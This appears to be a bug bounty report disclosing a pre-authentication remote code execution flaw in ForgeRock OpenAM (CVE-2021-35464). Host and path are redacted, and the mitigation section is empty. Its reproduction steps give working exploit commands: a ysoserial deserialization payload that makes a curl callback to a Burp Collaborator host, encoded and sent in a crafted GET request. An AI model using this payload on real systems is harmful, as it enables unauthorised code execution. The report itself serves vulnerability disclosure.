Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)

RCE is possible thanks to unsafe Java deserialization in the Jato framework used by OpenAM. ### Supporting Material/References - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 ## Impact An unauthenticated, 3rd-party attacker or adversary can execute remote code ## System Host(s) ████ ## Affected Product(s) and Version(s) ForgeRock OpenAM ## CVE Numbers CVE-2021-35464 ## Steps to Reproduce First we need to build the payload: 1. Download this jar file ``wget https://github.com/Bin4xin/sweet-ysoserial/blob/master/target/ysoserial-0.0.6-SNAPSHOT-all.jar`` then ``java -jar ysoserial-master-SNAPSHOT.jar Click1 "curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' | tr -d '\n' > payload.txt`` You need to change the burp Collaborator id to test it properly. The payload is now saved in the payload.txt file. Now we need to use the following request: ``` GET /██████████=XYZ HTTP/1.1 Host: 127.0.0.1 ``` Replace **XYZ** by the payload saved into the payload.txt file. The response ``` HTTP/1.1 302 Found Cache-Control: private Location: https://127.0.0.1:443/openam/base/AMInvalidURL Content-Length: 0 ``` The HTTP Request sent the collaborator : ███ ## Suggested Mitigation/Remediation Actions